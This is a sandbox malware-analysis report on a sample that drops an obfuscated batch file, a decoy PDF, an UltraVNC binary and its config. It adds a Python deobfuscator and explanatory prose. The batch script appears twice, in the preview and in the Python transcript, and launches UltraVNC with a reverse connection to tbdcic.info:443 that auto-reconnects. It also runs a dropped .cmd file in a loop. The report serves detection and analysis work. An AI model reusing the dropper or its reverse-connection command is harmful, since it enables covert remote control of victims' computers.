                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfshHHrPeUkwRe9:YvXKXtjL1bsdTeOsDGUUUkee9
                                                                    MD5:40F78B2A8D07B50F4530CB79E709ED25
                                                                    SHA1:C2C1C1A2CE63BE5025B51B592B480CEA7C63922A
                                                                    SHA-256:2A3B0F507870FB89A108413C7CF31EA526C87A308A5CB6C12C19538FA6AD29CA
                                                                    SHA-512:E38443E8C57B8CF407A2FD6AA262020BB47F169D99DDE657BB49EE5353453BB34C79A14D558F2DBEE8BE4F18D03821A999559B30670DDC81A8CE55489B3FCCF1
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):282
                                                                    Entropy (8bit):5.282320782228978
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJTqgFCrPeUkwRe9:YvXKXtjL1bsdTeOsDGTq16Ukee9
                                                                    MD5:29E3EAF934989E79AD5C06351D466000
                                                                    SHA1:992C2D1A74730272F700ECE26A68DB42314C09B0
                                                                    SHA-256:53CA86922BC82E35F8A796DD3B6D078E6F571347E5396406048F702744797C15
                                                                    SHA-512:7AAF2AA8B675B5FC196B39991B9B73F4D7A526CF1E9ABA8ED380A2FB1F98E49E5D87B9DA9DEFA754A8DA97527E7DEB7ACF02E13ED798CDAF1F6C55ABDB5633B1
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):0.8112781244591328
                                                                    Encrypted:false
                                                                    SSDEEP:3:e:e
                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                    Malicious:false
                                                                    Preview:....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):2814
                                                                    Entropy (8bit):5.144131416329443
                                                                    Encrypted:false
                                                                    SSDEEP:24:YR6YqGaSmay3qo8qzPqJzjTqG4YqHpYqQfLzjH4oj0SRDXlbgEe26s2LSRNC/Vwf:YRpf3wOYq5xcfst6VG7bMd8D279gn
                                                                    MD5:F978961B028E3CB132B834CBB4B17EB6
                                                                    SHA1:04836563EB0FE09B24D80AA41FE71FECFC745139
                                                                    SHA-256:0139C2456B51635426809FE60BC85B76297237633CDB8EB6338018B315E9C3B9
                                                                    SHA-512:EC93F3D51EC8CE1D333FB71F50963E0907AC3730892E77CC21A4D4A9B76ECDF3777103CF9E175F10E2A40308F48E6E866306D11FA9E3C20815E35CD5F01A5331
                                                                    Malicious:false
                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4bf8e3f8c4905d7a32eb0f6c94473fa4","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957469000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"a9cd5c5c9c1cd6619955312228472bd1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957469000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"bc4d71814e94e9db47f6a01ec2d9eab3","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957469000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e466c981bf9c5df2a5132d84ae76b48b","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957469000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"34623ccffb1e2e9139b91366a625da1c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957469000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"f66c1f743cf205264d83a544a6666c96","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):1.453646778732422
                                                                    Encrypted:false
                                                                    SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsili:lNVmsw3SHtbDbPe0K3+fDZdI
                                                                    MD5:B3FE83D88265B4D6BA9B0555288E0EE9
                                                                    SHA1:484DCC0C5D55D53BB3778120F973F92ECB0B6C2B
                                                                    SHA-256:F04B2C2B3EA52159E6527A45DA5A0470D1438AAB8E6A5CFBA96F9FA6123DF51F
                                                                    SHA-512:6CFDCB70F79111DD9BCFD75DDB67522D1458C96D4876E86BE3EEDE03F39FDCDC0C66E9556E79361296D16AA55A4F5AC848DD5C1BE5D294936F77A1801A775AA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):1.9581680794912386
                                                                    Encrypted:false
                                                                    SSDEEP:48:7MI4SrvrBd6dHtbGIbPe0K3+fDy2dsLjqFl2GL7ms6:7063SHtbDbPe0K3+fDZd6KVms6
                                                                    MD5:3562B93462C73F8FBB9274C6B993D4E0
                                                                    SHA1:7A7308404CAE8B9F62DA58131296B1EEC7393A58
                                                                    SHA-256:F3CE8F0B13B4F6A6D8E985DA61BD9038B88B69778F31FF78386C23D461333587
                                                                    SHA-512:941B0187EDB58D418316040616624391D4BD4E85F5CC8217898603823802138D1EAF26EB9BBA09F4CCDFD8BC6E6663DB451A3D400C0DDF15EE9E30C043FBC767
                                                                    Malicious:false
                                                                    Preview:.... .c..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):66726
                                                                    Entropy (8bit):5.392739213842091
                                                                    Encrypted:false
                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgG2G//GDdFt3VK3pCMC4Bhqh3pS6x7Yyu:6a6TZ44ADEG6t3VK3VC4B4hZnx7K
                                                                    MD5:E271E7162F123A0B30F4F3C0FF9FD4A1
                                                                    SHA1:6B0E02ACCDE6D6D8383E6AD121C2E81358548762
                                                                    SHA-256:08804B03C84EAED75F70F4D4D9E975BA21988861CAEEAB22806C89318831B7B3
                                                                    SHA-512:CCF89FCC972D89B1165926EF436D61D809FEEB791F864BB96E8B18798154A29DDF4D1606F4AD5F776017C3DCF9113708C55F486A6C01F85FBA15BDB6E89FB7F5
                                                                    Malicious:false
                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:DOS batch file, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1063
                                                                    Entropy (8bit):5.5415018235723945
                                                                    Encrypted:false
                                                                    SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                                    MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                                    SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                                    SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                                    SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                                    Malicious:false
                                                                    Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim
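The batch file above hides every meaningful string by splitting it across randomly named `set` variables and reassembling the pieces with `%var%` references. The following Python deobfuscator is an added example for this report, not the sample's own code and not part of the Joe Sandbox output: it collects the script's `set` assignments, resolves them in the remaining lines, and pulls out the host:port handed to UltraVNC's `-connect` switch. The batch text is transcribed from the Preview field (line breaks restored; the transcript stops where the preview is cut off inside the final `if exist` loop). Environment variables the script does not define (`%WINDIR%`, `%HOMEPATH%`, `%COMPUTERNAME%`) are deliberately left unresolved.

```python
import re

# The dropper's batch file, transcribed from the report's Preview field above
# (the report shows line breaks as '.'; they are restored here). The preview is
# cut off inside the final 'if exist' loop, so the transcript stops there too.
DROPPER_BAT = r"""@echo off
setlocal enabledelayedexpansion
set dLblEw=nhost
set H9zjF6=nne
set Ely6ya=co
set rsZWbB=exe
set e2uPdm=Lom
set RscJfa=pdf
set DE4CBb=raVNC
set jq2jOU=%COMPUTERNAME%
set q6noQx=autore
set WWfq61=%WINDIR%\Tasks\698563441.cmd
set AMDK6l=tbdcic.info
set qC9Ryl=Thj0Wf
set eUynLD=443
set uTrzGi=co
set ayToqv=ct
set nM9rdS=Ult
set TfRayV=sync_browser
set erudre=ini
timeout /t 1
copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%"
timeout /t 1
taskkill /f /im %TfRayV%.%rsZWbB%
timeout /t 2
copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%"
timeout /t 1
copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%"
timeout /t 2
start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB%
timeout /t 8
start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%
timeout /t 2
copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%"
timeout /t 4
:loop
if exist "%WWfq61%" (
 cmd /c "%WWfq61%"
"""

SET_RE = re.compile(r"^\s*set\s+([A-Za-z0-9_]+)=(.*)$", re.IGNORECASE)
VAR_RE = re.compile(r"%([A-Za-z0-9_]+)%")


def parse_sets(script):
    """Collect the script's own 'set NAME=VALUE' lines: the obfuscation dictionary."""
    return {m.group(1): m.group(2).rstrip()
            for m in map(SET_RE.match, script.splitlines()) if m}


def expand(text, table, max_rounds=10):
    """Resolve %NAME% for names the script defines. Environment variables it
    does not define (%WINDIR%, %HOMEPATH%, %COMPUTERNAME%) are left in place
    because their value is only known on the victim host."""
    for _ in range(max_rounds):
        new = VAR_RE.sub(lambda m: table.get(m.group(1), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def deobfuscate(script):
    """Return every non-'set', non-empty line with the variables resolved."""
    table = parse_sets(script)
    return [expand(line, table).strip()
            for line in script.splitlines()
            if line.strip() and not SET_RE.match(line)]


def connect_targets(commands):
    """Extract host:port pairs passed to UltraVNC's -connect switch, which makes
    the server dial out (reverse connection) instead of listening for viewers."""
    pairs = []
    for cmd in commands:
        pairs += [(h, int(p)) for h, p in
                  re.findall(r"-connect\s+([A-Za-z0-9.\-]+):(\d+)", cmd)]
    return pairs


if __name__ == "__main__":
    resolved = deobfuscate(DROPPER_BAT)
    print("\n".join(resolved))
    print("reverse-connection targets:", connect_targets(resolved))
```

Resolved, the script opens a decoy `Lom.pdf` from the user's Downloads folder (which is why Acrobat and its dropped cache files appear in this report), kills and replaces `sync_browser.exe` under `%WINDIR%\Tasks`, drops `UltraVNC.ini` beside it, and then launches it a second time with `-autoreconnect -id:%COMPUTERNAME%_Thj0Wf -connect tbdcic.info:443`: a UltraVNC reverse connection that dials out to tbdcic.info on port 443, identifying the host by computer name plus the `Thj0Wf` tag, and redials if the link drops. It also writes a copy of `sdABZ4.E1924R` as `conhost.exe` in the same directory and loops waiting for `%WINDIR%\Tasks\698563441.cmd`, which it executes whenever it appears. The `-connect` target and the `%WINDIR%\Tasks\sync_browser.exe` path are the indicators worth carrying into detection content.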
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:Generic INItialization configuration [admin]
                                                                    Category:dropped
                                                                    Size (bytes):858
                                                                    Entropy (8bit):5.216893826927931
                                                                    Encrypted:false
                                                                    SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                    MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                    SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                    SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                    SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                    Malicious:false
                                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):1945368
                                                                    Entropy (8bit):6.532894678367002
                                                                    Encrypted:false
                                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: 7q551ugrWe.exe, Detection: malicious
                                                                    • Filename: T8xrZb7nBL.exe, Detection: malicious
                                                                    • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                    Category:dropped
                                                                    Size (bytes):605114
                                                                    Entropy (8bit):7.931189302613814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                    Malicious:false
                                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                    Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):867840
                                                                    Entropy (8bit):6.386550733462827
                                                                    Encrypted:false
                                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: 7q551ugrWe.exe, Detection: malicious
                                                                    • Filename: T8xrZb7nBL.exe, Detection: malicious
                                                                    • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):246
                                                                    Entropy (8bit):3.5101311170247493
                                                                    Encrypted:false
                                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkD:Qw946cPbiOxDlbYnuRKDlDD
                                                                    MD5:1196E6369523C7D8615562130FA101FB
                                                                    SHA1:BAFD8603C8949FD38D69F6BB52DCC38B2787C596
                                                                    SHA-256:F1522CB2BA8513BDF2D8D691A21BB025654FDCC27F945091D7AA2D6CCEE19311
                                                                    SHA-512:78C2743858E142EABD05D5009362724E327CBA992CEDB11FF9A386569EE2916501D7E749FFCE2E42E1DBE5D12255D18081775A4513D052A5A44A2FC623B23486
                                                                    Malicious:false
                                                                    Preview (decoded from UTF-16):Error 2711.The specified Feature name ('ARM') not found in Feature table. === Logging stopped: 23/12/2024  07:37:44 ===
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393)
                                                                    Category:dropped
                                                                    Size (bytes):16525
                                                                    Entropy (8bit):5.386483451061953
                                                                    Encrypted:false
                                                                    SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                    MD5:F49CA270724D610D1589E217EA78D6D1
                                                                    SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                    SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                    SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                    Malicious:false
                                                                    Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15114
                                                                    Entropy (8bit):5.3656857403041025
                                                                    Encrypted:false
                                                                    SSDEEP:384:Qu03cqZLSxsXACgJdDANJSHPEXNmKrPdzYs46GaLJ43U/tknZ4AvZ0ZYtS8C+Dbq:4vr
                                                                    MD5:0B3E96BDBCDA60F4C71D40D8448C1364
                                                                    SHA1:8EA062A4E16F840D4D672F5A72DF90AF977E299F
                                                                    SHA-256:D56BFA178F31352BC253C94F2B58C0DD25130AADA20BE7967247F370C311819A
                                                                    SHA-512:E5F884ABDC2BDFCF9B6270A96FA57609F7314C11FCDD22C8F1D8D47801B5A8372219AD03FE5BE3C88BBFBDC5C684EF249FA36AE5DD8C0D8BB1C4A77322EFAA48
                                                                    Malicious:false
                                                                    Preview:SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:687-0500 ThreadID=7320 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_NglAppLib Description="SetConf
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):35721
                                                                    Entropy (8bit):5.415378283324518
                                                                    Encrypted:false
                                                                    SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRL:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRJ
                                                                    MD5:67FCDFFFE4E9113ABEE902CA14FDB015
                                                                    SHA1:49F41DAF13DCFF7FE8711A7B9B94BC1BD3992162
                                                                    SHA-256:090AAA7CBF5CCE2C4464B8816BA974AD10DD3C36C86FA6EDFC202E7EFE62D5D0
                                                                    SHA-512:7EF4F24FA54AD11CDBB4478E7CCF69C48947295CB25632A57225757E9393B453FF37850699368140A7E5C15062859A1AB80E89A11154A201F9F1687DF119B1D8
                                                                    Malicious:false
